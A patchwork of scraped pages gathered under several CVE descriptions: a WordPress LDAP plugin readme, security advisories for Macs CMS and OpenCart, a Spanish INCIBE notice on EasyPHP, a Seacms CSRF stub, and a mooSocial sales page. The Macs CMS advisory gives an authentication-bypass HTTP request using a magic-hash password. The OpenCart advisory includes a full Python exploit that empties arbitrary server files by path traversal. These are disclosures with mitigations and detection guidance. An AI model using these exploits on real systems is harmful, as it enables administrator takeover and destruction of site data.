The Staff / Employee Business Directory for Active Directory plugin for WordPress is vulnerable to LDAP Passback in versions up to, and including, 1.2.3. This is due to insufficient validation when changing the LDAP server. This makes it possible for authenticated attackers, with administrative access and above, to change the LDAP server and retrieve the credentials for the original LDAP server.

*   Details
*   Reviews
*   Installation
*   Development

Showcase | Documentation | Features | Contact Us

The Staff/Employee Business Directory for Active Directory plugin is used to perform an LDAP search and display the Staff / Employees present in your Active Directory on a WordPress site using a shortcode. The users / staff / employee details will be fetched from the Active Directory dynamically. That means the users will not be created in WordPress, and neither will their information be stored. Our plugin will seamlessly allow you to perform a Staff / Employee search through your business directory, employee directory, staff directory, or any other Active Directory implementations from your WordPress site and display the information you would like to see.

**Free Version Features**

*   Search LDAP / Active Directory users and Display them on your WordPress site.
*   Fetch information from a business directory, employee directory, staff directory, or any other Active Directory implementations.
*   Display the LDAP / Active Directory users using the configured attributes such as name, email, phone, and custom attributes.
*   LDAP custom attributes such as Department, Title, Birthday, etc., can also be used to perform LDAP search.
*   Display Profile Picture set in your LDAP / Active Directory as user profile picture in LDAP search results.
*   Search using different LDAP Search Bases that allow you to restrict employee / staff search to selected Search Bases (Organizational Units).
*   Auto-fetching the list of LDAP Search Bases / Organization Units (OUs) in your LDAP / Active Directory.
*   Support for LDAP Secure connection (LDAPS) and TLS Connection.

Support searching and fetching data dynamically from the following Active Directory implementations:

1.  Microsoft Active Directory
2.  Azure Active Directory
3.  Sun Active Directory
4.  OpenLDAP Directory
5.  JumpCloud
6.  FreeIPA Directory
7.  Synology
8.  OpenDS  
    and several other LDAP directory systems.

**Premium Version Features (Check out the Licensing tab to know more):-**

*   **Add unlimited LDAP / AD Attributes:** Add and configure as many LDAP/Active Directory custom attributes to display on your WordPress site.
*   **Multiple Search Attributes:** Search the LDAP / AD staff / employees using more than one LDAP attribute at a time. For example, search from the LDAP Server/Active Directory for users by name and city attributes.
*   **Auto-fetching of LDAP Organizational Units (OUs):** Fetches the LDAP Organizational Units (OUs) present in your Active Directory/ Business Directory/ Employee Directory/ Staff Directory or other LDAP Directory.
*   **Search Users from Multiple LDAP Search Bases:** Select multiple search bases and search LDAP users from these configured search bases from your Active Directory / other LDAP Directory.
*   **Custom Search Filter:** Add a Custom Search Filter to customize the LDAP Employee search result as per the requirements. Ex. Search only active LDAP Directory users, and restrict particular LDAP/Active Directory group users in LDAP search results.
*   **Fetch LDAP/Active Directory Profile Picture:** Display the thumbnail photo / Profile Picture set in your LDAP/Active Directory as the user profile picture in the search result.

**Use Cases Supported By Our Plugin**

*   Create a Phonebook Directory / Employee Directory / Staff Directory that is in sync with your Active Directory.
*   Fetch the complete profile information along with pictures of students enrolled in a school or university.
*   Display hospital staff and doctors with the details of their specialization from your Active Directory / LDAP on a WordPress page.
*   Search and display the employees’ / staff’s data present in your LDAP server on-the-fly without storing the employee information in WordPress.
*   Display Staff / Employees having birthdays and anniversaries on a specific page and send automated congratulating emails.

**Other Use-Cases we support**

*   **miniOrange WP LDAP/AD Login for Intranet sites plugin** supports login to WordPress sites using credentials stored in Active Directory and LDAP Directory systems. Only if you have access to **LDAP Extension** on your site.
*   **miniOrange Active Directory/LDAP Integration for Cloud & Shared Hosting Platforms Plugin** supports login to WordPress sites hosted on a shared hosting platform using credentials stored in active directory and LDAP Directory systems in case you are not able to enable **LDAP Extension** on your site.
*   **WordPress Login and User Management Plugin**: This plugin offers several functionalities, including bulk user management, user redirection based on WordPress roles, user session management, auto-logout users, and the ability to make a page or post private or public based on an ID or URL.
*   miniOrange supports **API Security use cases** to protect and secure your APIs using our product **XecureAPI** which helps you to enable Authentication methods ( like OAuth, SAML, LDAP, API Key Authentication, JWT Authentication etc ), Rate Limiting, IP restriction and much more on your APIs for complete protection.
*   miniOrange also supports **VPN use cases** Log in to your VPN client using Active Directory /other LDAP Directory credentials and **Multi-Factor Authentication**.
*   miniOrange supports **Single-Sign-On (SSO)** into a plethora of applications and supports various protocols like(**RADIUS, SAML, OAuth, LDAP/LDAPS**, using various IDP’s like **Azure Active Directory, Microsoft On-Premise Active Directory, Octa, ADFS**, etc.
*   Contact us at info@xecurify.com to know more.

**Why you should go with our solution**

*   **Support**: With search being one of the essential functions of a website, our priority support ensures that any issues you face on a live production site can be resolved on time.
*   **Regular updates**: We regularly update our plugin and ensure it is compatible with the latest WordPress versions. These updates include security and bug fixes that **provide you have the newest security fixes**.
*   Ensure timely updates for **new WordPress/PHP releases** with our premium plugins and compatibility updates to ensure you have adequate support for smooth transitions to new versions of WordPress and PHP.
*   **Reasonable priced**: Various plans are tailored to suit your needs. We provide discounts to educational and non-profit organizations and bulk discounts on large purchases.
*   **Easy to set up** : High-quality, easy-to-understand documentation will help you in setting up our plugin. Our developers can also help you by walking you through the setup process of the plugin.
*   High level of **customization** and **add-ons** to support specific requirements.

**Need support?**

Please email us at ldapsupport@xecurify.com or Contact us

**Minimum Requirements**

*   Compatible with WordPress version 5.0 or higher
*   Compatible with PHP version 5.2.0 or higher

**Prerequisites**

I. Staff/Employee Business Directory for Active Directory plugin requires the following PHP Modules to be enabled. Make sure you have enabled them.

1.  **PHP LDAP Module**:  
    Step-1: Open the php.ini file.  
    Step-2: Search for “extension=php\_ldap.dll” in the php.ini file. Uncomment this line. If it isn’t present, add this line to the file and save the file.
    
2.  **OpenSSL Module**:  
    Step-1: Open the php.ini file.  
    Step-2: Search for “extension=php\_openssl.dll” in the php.ini file. Uncomment this line. If not present, add this line to the file and save the file.
    

II. To install the Staff / Employee Business Directory for Active Directory plugin, the minimum requirements are:

1.  **WordPress version 5.0**
2.  **PHP version 5.2.0**

**From your WordPress dashboard**

1.  Visit Plugins > Add New
2.  Search for Staff/Employee Business Directory for Active Directory. Find and install the Staff/Employee Business Directory for Active Directory.
3.  Activate the plugin from your Plugins section.

**From WordPress.org**

1.  Download the Staff/Employee Business Directory for Active Directory.
2.  Unzip and upload the miniorange-ldap-directory-search directory to your /wp-content/plugins/ directory.
3.  Activate the Staff/Employee Business Directory for Active Directory from your Plugins section.

Make sure that if there is a firewall, you OPEN THE FIREWALL to allow incoming requests to your LDAP from your WordPress Server IP and open port 389 (636 for SSL or LDAPS).

**Why am I getting an error while trying to Test LDAP Connection?**

1.  Please make sure that the LDAP Server URL, Username and Password that you have entered are correct.
2.  In the Username field, please enter either the UserPrincipalName or DistinguishedName (DN) attribute of any user present in your LDAP server.
3.  Check if the LDAP server URL is accessible from your hosted site and the port 389 is open. { To check this, run this command on your WordPress server: >telnet < LDAP server URL or IP >:389 }
4.  If you are using a firewall, open the firewall to allow incoming requests to your LDAP from your WordPress Server IP and port 389.

If you have any queries or if you need any sort of assistance configuring our plugin, you can contact us at ldapsupport@xecurify.com. Our customer support team is available 24×7 to assist you in any way possible.

**What is meant by Search Base in my LDAP environment?**

1.  Search Base is a container / path where your LDAP/AD users that you want to search are present.
2.  This is the container in which the Staff/Employee Business Directory For Active Directory Plugin will search for LDAP users.
3.  The Search Base value can be obtained from the distinguishedName attribute of a container / node where the LDAP/AD users are present.

For example, if you want to search all LDAP/AD users in the Organizational Unit (OU) named “LDAPUsers. The Search Base would be OU=LDAPUsers, DC=DomainName, DC=SubDomainName.  
If you have any queries or if you need any sort of assistance in configuring our plugin, you can contact us at ldapsupport@xecurify.com. Our customer support team is available 24×7 to assist you in any way possible.

**I can not add more LDAP user attributes in the Attributes Configuration. Why?**

To add and display unlimited LDAP user attributes, please upgrade your existing plan to the premium plan.

**Is it possible to display only active (non-disabled) users from the LDAP/AD Server?**

Yes, It is possible using the custom search Filter feature, which is present in the premium version of our plugin.

Click here to view our detailed FAQ page.

For support or troubleshooting help, please email us at info@xecurify.com or Contact us.

**How does the Custom Search Filter work?**

Custom LDAP search filters allow you to apply advanced filters to your search. You can restrict / allow specific users belonging to LDAP groups or Organizational Units. For Example, If you want to display users from Sales Department, then you can do this using the below search filter:

(&(objectClass=user)(objectCategory=person)(sAMAccountName=?)(department=’Sales’))

**Does this plugin store any staff / employee information in the WordPress database?**

No, this plugin does not store any LDAP user’s data in the WordPress database. Our Staff / Employee Business Directory For Active Directory plugin dynamically fetches and displays users’ information on the fly.

We are using Staff / Employee Business Directory plugin for showing our employees on WordPress page. The plugin displays our employees on pages based on departments they are linked to Active Directory. The most amazing thing was Support we received from miniOrange. I am using other WordPress plugins for years and I never recieved this kind of quality support that miniOrange has provided us. They have very trained employees for problem solving. I would like to thank Vikas More for his amazing knowledge and problem solving skills that leaded to achieve our requirements. He is very tallented and proficient in the conversation. If we need any plugin in the future, miniOrange will be our first choice because of the product quality and most important the quick and great support we have received from Vikas. Keep it up the good work minOrange!

Great plugin - works well and excellent support for any customozation. Very Responsive support as well.

What a great plugin with great support. Easy to configure and setup!!

Wonderful Plugin and works better as expected!!! The support is TOP!

The plugin is really easy to install and configure. It does exactly what you want it to do. The technical support especially Vikas is really professional and responsive. We had to translate some terms in French and it was done quickly. I can only recommend this plugin. Thanks you.

The support (especially Vikas) is just great. We had a problem and they were really flexible and helpful. Now our search-function works perfectly and we know we can always rely on the support.

Read all 9 reviews

“Staff / Employee Business Directory for Active Directory” is open source software. The following people have contributed to this plugin.

Contributors

*    miniorange

**1.3**

*   Enhanced security measures to prevent LDAP Passback Vulnerability.

**1.2.3**

*   Security Fixes

**1.2.2**

*   Compatibility with the WordPress version 6.3

**1.2.1**

*   Compatibility with the WordPress version 6.2

**1.2.0**

*   WP Guideline & Security Fixes.
*   Code Optimization.

**1.1.2**

*   Black Friday Sale Advertisement.
*   Updated Licensing Page.
*   Added Settings Menu.

**1.1.1**

*   Added Advertisement for Trialware.
*   Minor Bug Fixes.
*   Compatibility with WordPress 6.1

**1.1**

*   Read me changes.
*   UI Improvements.
*   Added an optional feedback form on plugin deactivation.
*   Code optimization

**1.0.1**

*   Read me changes.
*   Minor UI changes.

**1.0**

This is the first version of the plugin.

CVE-2023-4505: Staff / Employee Business Directory for Active Directory

In Macrob7 Macs Framework Content Management System (CMS) 1.1.4f, loose comparison in "isValidLogin()" function during login attempt results in PHP type confusion vulnerability that leads to authentication bypass and takeover of the administrator account.

**CVE-2023-43154 - Macs Framework v1.1.4f CMS Type Confusion Vulnerability****Table of Contents**

1.  Overview
2.  Proof of Concept
3.  Technical Debrief
4.  Mitigation

**Overview**

**CVE-ID**: CVE-2023-43154

**CVSS 3.1**: 9.8

**Vulnerability Description**: A loose comparison in the isValidLogin() function results in a PHP type confusion vulnerability that can be abused to bypass authentication and takeover the administrator account.

**Vulnerable Parameters**: The username and password of the users on the CMS.

**Affected Products**: Macs Framework v1.14f - Content Management System

**Limitations**:

1.  The username of the victim account must be previously known or a zero-like string
2.  The password used with the account must result in a "magic hash".

**User Interaction Required**: None

**References**: https://github.com/ally-petitt/CVE-2023-43154-PoC

**Discovery Date**: September 7, 2023

**Reported By**: Ally Petitt

**Proof of Concept**

Logging in at the URI /index.php/main/cms/login with the username of the victim account and any password that results in a magic hash will lead to authentication bypass.

A sample login is shown below.

**Send Payload**

    POST /index.php/main/cms/login HTTP/1.1
    Host: 172.17.0.2
    Content-Length: 62
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
    Content-Type: application/x-www-form-urlencoded
    Origin: http://172.17.0.2
    Referer: http://172.17.0.2/index.php/main/cms/login
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: PHPSESSID=di4ceqcv9432vcb0p27rkh7k82
    Connection: close
    
    ajaxRequest=true&&username=testadmin&password=0gdVIdSQL8Cm&scrollPosition=0
    

**HTTP Response**

    HTTP/1.1 200 OK
    Date: Sat, 09 Sep 2023 02:01:26 GMT
    Server: Apache/2.4.25 (Debian)
    X-Powered-By: PHP/5.6.40
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Vary: Accept-Encoding
    Content-Length: 72
    Connection: close
    Content-Type: text/html; charset=ISO-8859-1
    
    <script>window.location.href="http://172.17.0.2/index.php/home"</script>
    

The status code of 200 and the redirect to /index.php/home are both indications that the login attempt was successful. The password of testadmin was not the password used in the login attempt (0gdVIdSQL8Cm). Instead, it was set to QNKCDZO.

**Technical Debrief**

When a user attempts to log in, their supplied password is hashed and and sent as a parameter to the isValidLogin() function via the initial login() function that is called when a POST request is made to /index.php/Main/CMS/login.

        public function login()
        {      
          if($this->isValidLogin(Post::getByKey('username'), $this->encrypt(Post::getByKey('password')) ) || ( $this->isAdminLoggedIn() ))
          --snip--
        }
    

The isValidLogin() function begins on line 83 of file /Application/plugins/CMS/controllers/CMS.php. It is vulnerable to a type confusion vulnerability due to its use of 2 equal signs instead of 3.

        private function isValidLogin($username, $password)
        {
          $this->loadModels();
          
          $loggedIn = false;
    
          foreach (Config::$editInPlaceAdmins as $key=>$account)
          {
            if(( $account['username'] == $username) && ($account['password'] == $password ) )
            {
              $loggedIn = true;
              Session::set('AdminLoggedIn', $account);
              break;
            }
          }
    

As shown in the if statement, the username and password are being checked with a loose comparison, leading to a PHP type confusion vulnerability. This can be abused when logging in with a password that results in a magic hash, or hash that is interpretted by PHP to have the value 0 during a loose comparison. A list of such passwords can be found here.

To exploit this, it is important to first understand the format that $account['password'] is stored in. In the function used to save a new user account on line 730 of the aforementioned CMS.php file, it becomes clear that the password is first passed through an encrypt function before it is stored.

      $password = $this->encrypt(Post::getByKey('password'));
      $confirmPassword = $this->encrypt(Post::getByKey('confirmPassword'));
      -- snip --
      private function saveNewUser( $username, $password, $emailAddress, $roleId)
    

Continuing to the function that is called after the password is run through encrypt, the following code is used:

        private function saveNewUser( $username, $password, $emailAddress, $roleId)
        {
          --snip--
                $this->usersModel->insertUser($username, $password, $emailAddress, $roleId);
          --snip--
        }
    

Based on the code above, it is apparent that the "encrypted" password was placed directly into the users Model of the MVC framework. Finally, to exploit this vulnerability, it is necessary to understand how the encrypt function works as its output is being directly compared against the user input.

        private function encrypt( $string )
        {      
          return md5($string);
        }
    

The encrypt function returns the MD5 hash of the string passed to it. This means that when the login() function is called with the user-supplied credentials, the inputted password is hashed and compared against the stored MD5 hash of the victim account.

The implication is that when using a password that results in a PHP collision, or magic hash, it will register as being equivilent when compared against a stored password that also follows the format of a magic hash. As a result, a very large number of passwords can be used to authenticate to and takeover the administrator account, even when the initial password is not previously known.

**Mitigation**

This vulnerability can be mitigated by changing the loose comparison in the isValidLogin() function to a strict comparison by replacing == with ===.

CVE-2023-43154: GitHub - ally-petitt/CVE-2023-43154-PoC: PoC for the type confusion vulnerability in Mac's CMS that results in authentication bypass and administrator account takeover.

Path Traversal in OpenCart versions 4.0.0.0 to 4.0.2.2 allows an authenticated user with access/modify privilege on the Log component to empty out arbitrary files on the server

**Summary:**

**Product**

OpenCart

**Vendor**

OpenCart

**Severity**

High - Adversaries may exploit software vulnerabilities to empty any file on the server with write permissions.

**Affected Versions**

4.0.0.0 - 4.0.2.2

**Tested Version(s)**

4.0.2.2

**CVE Identifier**

CVE-2023-2315

**CVE Description**

Path traversal in Opencart versions 4.0.0.0 to 4.0.2.2 allows authenticated backend users to empty any existing file on the server with write permissions.

**CWE Classification(s)**

CWE-27 - Path Traversal: ‘dir/../../filename’

**CAPEC Classification(s)**

CAPEC-126 - Path Traversal

**CVSS3.1 Scoring System:**

**Base Score:** 8.1 (High)  
**Vector String:** CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

**Metric**

**Value**

**Attack Vector (AV)**

Network

**Attack Complexity (AC)**

Low

**Privileges Required (PR)**

Low

**User Interaction (UI)**

None

**Scope (S)**

Unchanged

**Confidentiality (C)**

None

**Integrity (I)**

High

**Availability (A)**

High

**Product Overview:**

Opencart is an open source ecommerce platform for online merchants to self-host and list their products for sale. It is structured in a way that allows for a quick setup and Opencart also provides a cloud solution for users who do not want to have an on-premise setup. Opencart is split into two fronts: a storefront containing a catalogue that regular users will access, as well as a backend administrative dashboard for management purposes. Account roles for the backend dashboard are highly customizable, allowing the owner of the website to initialise custom roles with different privileges and access, by using the fine-grained controls.

**Vulnerability Summary:**

There is a path traversal vulnerability at the Logs section of the backend dashboard, which allows an authenticated adversary to empty any existing file on the web server, given that there is write permissions on the file. By default, every OpenCart file is able to be emptied. This means that the availability of the website will be heavily impacted by emptying the core files, preventing regular functionality of the website. This vulnerability was introduced from versions 4.0.0.0 onward and patched in version 4.0.2.3.

**Vulnerability Details:**

A backend user with “access” and “modify” permissions on the “tool/log” setting is able to clear the logs of the website. When clearing the logs in a regular use case, a HTTP GET request is sent to delete the file “error.log”, by specifying it in the filename query parameter. The relevant code that is vulnerable can be found below:

    // /admin/controller/tool/log.php
    
    public function clear(): void {
    
        if (isset($this->request->get['filename'])) {
            $filename = (string)$this->request->get['filename']; // [1]
        } else {
            $filename = '';
        }
    
        $json = [];
    
        if (!$this->user->hasPermission('modify', 'tool/log')) {
            $json['error'] = $this->language->get('error_permission');
        }
    
        // DIR_LOGS = /system/storage/logs/
        $file = DIR_LOGS . $filename; // [2]
    
        if (!is_file($file)) {
            $json['error'] = sprintf($this->language->get('error_file'), $filename);
        }
    
        if (!$json) {
            $handle = fopen($file, 'w+'); // [3]
            fclose($handle);
            $json['success'] = $this->language->get('text_success');
        }
        // ...
    }
    

At [1], the filename is obtained from the incoming HTTP GET request and stored into the $filename PHP variable without any form of input sanitisation. At [2], the file name is appended to the back of the storage log path /system/storage/logs/ and stored into another variable $file. At [3], the $file variable is used in a fopen() function call with the mode set to w+. This means that the existing file will have its content emptied. Since a file existence check occurs before this, it is not possible to create files that do not already exist.

In a normal scenario, the file /system/storage/logs/error.log will be emptied after the GET request is sent. However, since there is a lack of input sanitisation, it is possible for the filename query parameter to contain any number of path traversal sequence (../) to traverse out of the intended directory and point to other files instead. This results in other files being emptied and permanently affecting the website’s functionality.

**Exploit Conditions:**

This vulnerability can be exploited when the attacker has a set of valid credentials to the backend dashboard with access and modify permissions on tool/log.

**Proof-of-Concept:**

We have tried our best to make the PoC as portable as possible. This report includes a functional exploit written in Python3 that exploits the Path Traversal vulnerability.

The vulnerability can be exploited by sending a GET request to https://TARGET_HOST/admin/index.php?route=tool/log.clear&user_token=<USER_TOKEN>&filename=../../../../../../tmp/PoC.txt, for example:

    GET /admin/index.php?route=tool/log.clear&filename=../../../../../../tmp/PoC.txt&user_token=4d6d604d8862798e96fe91846f28a36f HTTP/1.1
    Host: TARGET_HOST
    Cookie: OCSESSID=4f09deedf4a82f9c5b4bee9ec3;
    

Before running the exploit below, please ensure that you create a non-empty file /tmp/PoC.txt and that it has write permissions for the web user:

    $ echo "Hello" > /tmp/PoC.txt
    $ chmod 777 /tmp/PoC.txt 
    $ ls -la /tmp/PoC.txt
    -rwxrwxrwx 1 root root 6 Apr 26 09:36 /tmp/PoC.txt
    

Then, run the exploit below:

    # Opencart v4.0.0.0 - v4.0.2.2 path traversal arbitrary file emptying (CVE-2023-2315)
    # Author: Poh Jia Hao (STAR Labs SG Pte. Ltd.)
    
    #!/usr/bin/env python3
    import re
    import requests
    import sys
    requests.packages.urllib3.disable_warnings()
    
    s = requests.Session()
    
    def check_args():
        global target, username, password
    
        print("\n======= Opencart v4.0.0.0 - v4.0.2.2 path traversal arbitrary file emptying (CVE-2023-2315) =======")
        print("Please ensure that a file /tmp/PoC.txt with write permissions has been created on the target server with non-empty content!\n")
    
        if len(sys.argv) != 4:
            print("[!] Please enter the required arguments like so: python3 {} http://TARGET_URL/ADMIN_PATH/ USERNAME PASSWORD".format(sys.argv[0]))
            sys.exit(1)
    
        target = sys.argv[1].strip("/")
        username = sys.argv[2]
        password = sys.argv[3]
    
    def authenticate():
        global user_token
    
        print("[+] Attempting to authenticate...")
    
        # Get login_token
        path = f"{target}/index.php"
        res = s.get(path)
        login_token = re.findall("login_token=(.+)\" method", res.text)[0]
        
        # Perform login and get user_token
        data = {
            "username": username,
            "password": password
        }
        path = f"{target}/index.php?route=common/login.login&login_token={login_token}"
        res = s.post(path, data=data)
        user_token = re.findall("user_token=(.+)\"", res.text)[0]
    
        if not user_token:
            print("[!] Failed to authenticate! Are the credentials correct?")
            sys.exit(1)
    
        print("[+] Authenticated successfully.")
    
    def delete():
    
        print("[+] Attempting to empty /tmp/PoC.txt...")
    
        # Empty /tmp/PoC.txt
        path = f"{target}/index.php?route=tool/log.clear&filename=../../../../../../tmp/PoC.txt&user_token={user_token}"
        res = s.get(path)
        print(f"[+] Output: {res.text}")
    
    def main():
        check_args()
        authenticate()
        delete()
    
    if __name__ == "__main__":
        main()
    

**Suggested Mitigations:**

OpenCart released version 4.0.2.3 that patches this vulnerability. It is recommended to upgrade to the latest version of OpenCart.

**Detection Guidance:**

It is possible to detect the exploitation of this vulnerability by checking the server’s access logs for all GET requests made to /admin/index.php?route=tool/log.clear, and filtering for requests that contain ../ in the filename query parameter.

**Credits:**

Poh Jia Hao (@Chocologicall) of STAR Labs SG Pte. Ltd. (@starlabs\_sg)

**Timeline:**

*   2022-09-06 Followed the security bug reporting instructions and created an OpenCart forum account to try to report to the administrators, but new accounts are unable to send private messages.
*   2022-09-11 Email sent to [email protected] in an attempt to establish a proper communication channel with the project owner/maintainers.
*   2022-09-12 Support agent replied and suggested to describe the issue in a public channel via their GitHub Issues tracker, to which we reminded that it is a security bug on the latest version. Support agent then requested to send them the report where they will forward it to the developers. We instead requested for the public key of the developers so that the report can be encrypted to prevent information leakage. Support agent replied “they do not have such”.
*   2022-09-14 Tried the “Contact Us” form on OpenCart’s website. Ended up with a second support ticket being opened.
*   2022-09-15 Opened a GitHub Issue (#12684) in a last resort to establish a proper communication channel with the developers. Issue closed immediately by the project owner, and **marked as spam**.
*   2022-09-15 Email sent directly to [email protected] as it is used for GitHub commits.
*   2022-09-15 Project owner replied and we sent the bug report over.
*   2022-09-15 Bug fixed in commit 0a8dd91
*   2023-09-16 New release version 4.0.2.3 containing the patch.
*   2023-09-18 Public Release

CVE-2023-2315: (CVE-2023-2315) Path Traversal in OpenCart versions 4.0.0.0 to 4.0.2.2

An OS command injection vulnerability has been found on EasyPHP  Webserver affecting version 14.1. This vulnerability could allow an attacker to get full access to the system by sending a specially crafted exploit to the /index.php?zone=settings parameter. 

Fecha de publicación

26/09/2023

Recursos Afectados

EasyPHP Webserver, versión 14.1.

Descripción

INCIBE ha coordinado la publicación de 1 vulnerabilidad que afecta a EasyPHP Webserver 14.1, la cual ha sido descubierta por Rafael Pedrero.

A esta vulnerabilidad se le ha asignado el siguiente código, puntuación base CVSS v3.1, vector del CVSS y el tipo de vulnerabilidad CWE de cada vulnerabilidad:

*   **CVE-2023-3767**: CVSS v3.1: 9.8 | CVSS: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | CWE-78.

Solución

La vulnerabilidad reportada ha sido solucionada en la última versión del producto afectado.

Detalle

**CVE-2023-3767**: se ha encontrado una vulnerabilidad de inyección de comandos del sistema operativo en el servidor web EasyPHP que afecta a la versión 14.1. Esta vulnerabilidad podría permitir a un atacante obtener acceso completo al sistema enviando un _exploit_ especialmente diseñado al parámetro '/index.php?zone=settings'.

CVE-2023-3767: Inyeccion De Comandos Os En Easyphp Webserver | INCIBE-CERT

A Cross-Site Request Forgery (CSRF) in admin_manager.php of Seacms up to v12.8 allows attackers to arbitrarily add an admin account.

**CVE-2023-43278**

版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。

\[CVE-ID\]

CVE-2023-43278

\[PRODUCT\]

Seacms <=12.8

\[VERSION\]

Seacms <=12.8

\[PROBLEM TYPE\]

CSRF

\[DESCRIPTION\]

There is a CSRF vulnerability in the backend management system of seacms v12.8

CVE-2023-43278: CVE-2023-43278_sugaryzheng的博客-CSDN博客

mooSocial v3.1.8 was discovered to contain a cross-site scripting (XSS) vulnerability via the change email function.

*   Home
*   Features
*   Screenshots
*   Pricing
*   Services
*   Testimonials
*   Showcases
*   Add-ons
*   Contact

**Mobile Friendly Social Network Software**

mooSocial is the best social network script to create a niche community or social site. It is features packed, highly configurable, expandable with many quality add-ons. mooSocial is mobile-friendly ready, it is easily accessible thru mobile web or Android and iOS mobile apps. Start your community site in minutes, It is easy to use even without design or programing skills.

Or

See people talking about us

Great aftermarket customer services

Reviewed by **Eddie Alder**

Fantastic product and customer support!

Reviewed by **Brett Cohen**

I have had only good experiences with the software mooSocial

Reviewed by **Dejan Dejan**

Hands down the best social network software period!

Reviewed by **Julian Hughes**

**Why Choose mooSocial?**

mooSocial is a **"white labeled" php social network software.  
It is **light, fast, easy to customize, and mobile-friendly.****

**

**Full Feature**

With all the features to build a successful social network e.g. blog, photo, group, event, video, topic…

**Monetization**

MooSocial supports many monetization methods such as advertising placement services, ad-free membership or exclusive access rights.

**Quick Support**

Multiple support channels (ticket, skype, community and online chat), Active Development and Docs

**Performance**

It has a lightweight codebase which will run blazingly fast even on a shared web hosting service.

**Mobile Apps**

Our publishable mobile apps will bring your community closer customer’s finger tip and allow you to engage with your members in a whole new way.

**No limit on code access**

Get all source code include mobi app source code.

**Addons**

Expand your social network easily, affordably with high-quality plugins and themes made by the same team. Most of plugins are compatible with Mobile Apps

**Internationalization (I18n)**

MooSocial is able to cater to users in different languages. It can handle multiple languages, scripts and cultural conventions (currency, sorting rules, number and dates formats…) without the need for redesign.

**Zero headache**

Zero headache to deal with 3rd party developers and compatible issues between developers becuase everything is from mooSocial Team





**

**

*   Full Features  - Click here to see a full list of features
    
    **User Profile**
    
    *   Activity Feed
    *   Friends
    *   Profile Privacy Settings
    *   Profile Cover Picture
    *   Profile Search
    *   Searchable Custom Profile Fields
    *   Featured Profile
    *   Friendly Profile URL
    
    **Video Sharing**
    
    *   Easily Share Youtube/Vimeo Videos
    *   Privacy Options
    *   Comments & Likes
    *   Tags
    *   Social Sharing
    *   Videos Search & Category
    *   Related Videos
    
    **User Group**
    
    *   Activity Feed
    *   Group Photos, Videos, Topics
    *   Invitation System
    *   Privacy Options
    *   Featured Groups
    *   Group Search & Category
    *   Social Sharing
    *   Membership Approval
    
    **User Blog**
    
    *   WYSIWYG Editor
    *   Privacy Options
    *   Comments & Likes
    *   Tags
    *   Images Uploader
    *   Social Sharing
    *   Blogs Search
    
    **Discussion Topics**
    
    *   Attachments
    *   WYSIWYG Editor
    *   Comments & Likes
    *   Tags
    *   Social Sharing
    *   Topics Search & Category
    *   Pin/Lock Topic
    
    **Photo Album**
    
    *   Photo Tagging
    *   Privacy Options
    *   Comments & Likes
    *   Tags
    *   Easy Uploader
    *   Social Sharing
    *   Albums Search & Category
    
    **Admin Panel**
    
    *   Admin Notifications
    *   Custom Blocks
    *   Easy Logo Changer
    *   Bulk Mail
    *   Spam Challenges
    *   User Roles/Permissions
    *   Pages Manager
    *   Hooks Manager
    *   Plugins Manager
    *   Themes Manager
    *   Languages Manager
    
    **Miscellaneous**
    
    *   Mobile Site
    *   Private Message
    *   Notifications Center
    *   Friends Suggestion
    *   URL & Video Parsing in Activity Feed
    *   Upload Photo in Activity Feed
    *   Facebook Integration
    *   Global Search
    *   Item Reporting
    
    **Event Management**
    
    *   RSVP Tracking
    *   Activity Feed
    *   Invitation System
    *   Privacy Options
    *   Event Search & Category
    *   Social Sharing
    *   Event Map
    
    **Monetize Features**
    
    *   Membership Subscription
    *   PayPal Adaptive Payments
    *   Ad Network Support
    

**

**

**Pricing + Combo**

*   mooSocial Self-hosted
*   mooSocial Cloud

**mooSocial License**

**$ 99**

One-time-fee  
(1 domain)

30-days free support

Include All Core Features and Core Plugins: Blogs, Photos Videos, Topics, Groups, Events

Full Source Code

First time free installation service

White-label. Customizable

12 Months Update Subscription

You can buy mooSocial license now then get the apps in combo packages later here

Recommended

**Deluxe**

**

$697

$ 669**

One-time-fee  
(1 domain)

mooSocial Pro Licence ($299)

Android and IOS Licence ($398)

Full Source Code

First time free installation service

White-label. Customizable

REST API Library

12 Months Update Subscription

60-days free support

**Ultimate**

**

$3164

$ 1669**

**Services**

**SOFTWARE MODIFICATION**

Want a unique feature? A specialized  
plugin? or even some simple changes?  
Sure! Our Customization Team will  
develop it for you quickly and  
efficiently.

**THEME DEVELOPMENT**

Distinguish your site with style. Our  
Design Team knows how to create  
unique visual experiences which are  
crucial to the success of your business.

**SITE MIGRATION**

Have a Social Network already but  
wanted to move to mooSocial? No  
problem, our Digital Mover Team will  
have you settled in your new home  
comfortably.

**PRODUCT INSTALLATION**

Installing mooSocial is a "no brainer".  
However, if you do not want to be  
bothered with it, we could help to get  
your new site up and running in no time.

**PRODUCT UPGRADE**

It doesn't matter which version you  
currently have, or even if our script was  
modified. We can upgrade your site to  
the greatest and latest with everything  
intact.

**INTEGRATION**

We can get mooSocial integrated with  
any service out there whether it is a  
payment gateway or a CMS. As long as  
there is API access, We can do it.

**What people say about us**

**Fantastic product and customer support!**

The folks at mooSocial have been fantastic. They assisted me in getting the product installed on my server and have been so helpful. The product itself is top notch, I did not come across any other product that is so perfect for social media.

Reviewed by Brett Cohen

**Hands down the best social network software period!**

I give it 10 stars if I could. Ryan and his team provide excellent customer support and best of all, the best social network software on the market. Your time and money will not be waste if you go with this company. Other softwares are full of bugs but this one is a winner!

Reviewed by Julian Hughes

**Moosocial Best Platform Ever!!!**

Moosocial Best Platform with all the tools you need for a social network, and marketing website, a lot of potential for the price, is nicely succeeding on the tools they are providing. It has a wiki, an instant messages, document management system - all (and a lot more) integrated in one extensible platform. Very recommended! Attractive interface and full of functionalities. Also excellent support from their community.

Reviewed by William D. Abreu

**Best around!**

